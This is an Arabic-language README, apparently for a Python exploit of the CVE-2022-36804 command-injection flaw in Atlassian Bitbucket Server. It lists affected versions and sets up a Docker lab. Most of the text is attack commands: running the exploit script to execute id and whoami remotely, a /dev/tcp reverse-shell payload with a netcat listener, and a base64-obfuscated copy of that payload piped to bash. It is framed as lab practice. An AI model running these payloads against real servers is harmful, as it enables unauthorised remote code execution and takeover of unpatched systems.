
استغلال Python لثغرة حقن الأوامر CVE-2022-36804 في Atlassian Bitbucket Server، مما يتيح تنفيذ الأوامر عن بُعد وصدفة عكسية مع أوامر قابلة للتخصيص وبيئة مختبر Docker.
تم اكتشاف ثغرة أمنية خطيرة لحقن الأوامر في عدة نقاط نهاية API لخادم Bitbucket من Atlassian ومركز البيانات. تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server و Data Center التي تم إصدارها قبل الإصدارات <7.6.17 و <7.17.10 و <7.21.4 و <8.0.3 و <8.1.2 و <8.2.2 و <8.3.1
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
استبدل 172.17.0.3 بعنوان IP المحلي الخاص بك
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"
nc -lvp 4444
https://www.revshells.comقم بتحويل `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` إلى base64 في حالة حدوث خطأ في تنفيذ الحمولة.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"
يوصى بتثبيت إصدار ضعيف من خادم Bitbucket على جهاز Windows/Linux للممارسة. سيكون تحقيق الشيل العكسي أسهل مقارنةً بصور Docker.
يمكن العثور على مزيد من المعلومات [هنا](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)
# المراجع
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804